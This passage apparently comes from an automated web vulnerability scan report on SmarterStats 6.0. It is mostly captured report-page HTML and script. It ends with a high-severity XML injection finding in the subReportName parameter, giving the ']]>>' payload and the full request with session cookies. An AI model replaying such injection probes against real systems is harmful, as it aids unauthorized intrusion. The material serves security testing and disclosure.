           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadStartDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/5/2010" id="ctl00_MPH_RadStartDate_dateInput_text" name="ctl00_MPH_RadStartDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate_dateInput" name="ctl00$MPH$RadStartDate$dateInput" type="text" class="rdfd_" value="2010-10-05-00-00-00" /><input id="ctl00_MPH_RadStartDate_dateInput_ClientState" name="ctl00_MPH_RadStartDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadStartDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadStartDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadStartDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadStartDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadStartDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadStartDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadStartDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadStartDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadStartDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadStartDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_SD" id="ctl00_MPH_RadStartDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_AD" id="ctl00_MPH_RadStartDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadStartDate_ClientState" name="ctl00_MPH_RadStartDate_ClientState" type="hidden" />
</div>
                       </td>
                       <td class='PaddedText'>
                           to
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadEndDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate" name="ctl00$MPH$RadEndDate" type="text" class="rdfd_" value="2010-10-11" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadEndDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/11/2010" id="ctl00_MPH_RadEndDate_dateInput_text" name="ctl00_MPH_RadEndDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate_dateInput" name="ctl00$MPH$RadEndDate$dateInput" type="text" class="rdfd_" value="2010-10-11-00-00-00" /><input id="ctl00_MPH_RadEndDate_dateInput_ClientState" name="ctl00_MPH_RadEndDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadEndDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadEndDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadEndDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadEndDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadEndDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadEndDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadEndDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadEndDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadEndDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadEndDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_SD" id="ctl00_MPH_RadEndDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_AD" id="ctl00_MPH_RadEndDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadEndDate_ClientState" name="ctl00_MPH_RadEndDate_ClientState" type="hidden" />
</div>
                       </td>
                   </tr>
               </table>
           </div>
           <div>
               <table cellspacing='0' class='ReportOptionSection'>
                   <tr>
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       <td class='GenerateReportButton'>
                           <div id="ctl00_MPH_btnGenerateReport" class="BBButton RefreshButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$MPH$btnGenerateReport',''); return false;"><span class="BBInner"></span></a></div>
                       </td>
                   </tr>
               </table>
           </div>
       </div>
       <div class='ReportOptionSection' style='display: none'>
           <div id="ctl00_MPH_UpdatePanel1">
   
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               
</div>
       </div>
   </div>
   <input type="hidden" name="ctl00$MPH$hfDMFilename" id="ctl00_MPH_hfDMFilename" />
   <input type="hidden" name="ctl00$MPH$hfDMReport" id="ctl00_MPH_hfDMReport" />
   <div id="ctl00_MPH_UP1">
   
           
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       
</div>
   <input type="submit" name="ctl00$MPH$btnShowReport" value="Display Report" id="ctl00_MPH_btnShowReport" style="display: none" />

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewreports', 'Standard\x5fSiteUsage');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=Specific/ProgressBar"></script>

   <script type="text/javascript">
       var loaded = false;
       function DoDataMine(file, report) {
           //location.href = '/Client/frmViewReports.aspx?reporttype=interactive&file=' + file + '&mine=' + report;
           parent.dmFilename = file;
           parent.dmQuery = report;
           parent.UpdateSection('UserDataMining', null, false, false); //filename
       }
       function AddFavoritePopup() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 320, null);
       }
       function AddFavoritePopup_Interactive() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 500, 270, null);
       }
       function AddFavoritePopup_SEO() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 230, null);
       }
       function ExportReportPopup() {
           var url = "/Client/Popups/frmExportReport.aspx";
           window.name = "GenericWindow";
           SpawnHyperWindow(url, 400, 100, null);
       }
       function EmailReportPopup() {
           if (false)
           {
            var url = "/Client/Popups/frmEmailReport.aspx";
            window.name = "GenericWindow";
            SpawnHyperWindow(url, 450, 340, null);
           }
           else
           {
            ShowAlertWindow("In order to send reports through email, SMTP information must be entered into the Email Settings page by a site administrator.");
           }
       }
       function PrintReportPopup() {
           var url = "/Client/Popups/frmPrintPreview.aspx";
           parent.GenericPopup(url, "PrintPreview", "width=700,height=500,resizable=yes,scrollbars=yes,status=no");
       }
       function RadDataMine(filename, miningset, report) {
        SpawnHyperWindowWithElement(
        "/Client/Popups/frmDataMine.aspx?file=" + filename + "&miningset=" + miningset + "&report=" + report,
        400, 130, null, DoDataMine);
       }

       function GetProgressUpdate() {
           PageMethods.GetReportProgress(progressGuid, ProgressBarCallbackComplete, ProgressBarCallbackFailed);
       }
       function DoReportPostBack() {
           //
__doPostBack('ctl00$MPH$btnShowReport','');
       }
       function DoReportCancel() {
           //
__doPostBack('ctl00$MPH$lnkCancel','');;
       }
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
       var ProgressBarText = 'Processing';

   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewReports\x2easpx?Custom\x3dFalse\x26ReportType\x3dStandard\x26subReportName\x3dSiteUsage'); });
$(function() { SetTopTitle('View\x20Report'); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/5/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadStartDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadStartDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadStartDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadStartDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadStartDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadStartDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadStartDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadStartDate_popupButton","clientStateFieldID":"ctl00_MPH_RadStartDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadStartDate_calendar","dateInput":"ctl00_MPH_RadStartDate_dateInput"}, $get("ctl00_MPH_RadStartDate"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/11/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadEndDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadEndDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadEndDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadEndDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadEndDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadEndDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadEndDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadEndDate_popupButton","clientStateFieldID":"ctl00_MPH_RadEndDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadEndDate_calendar","dateInput":"ctl00_MPH_RadEndDate_dateInput"}, $get("ctl00_MPH_RadEndDate"));
});
//]]>
</script>
</form>
</body>
</html>


3.14. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [subReportName parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The subReportName parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the subReportName parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=SiteUsage]]>> HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserSpiders"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:06 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 44398



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - SmarterStats
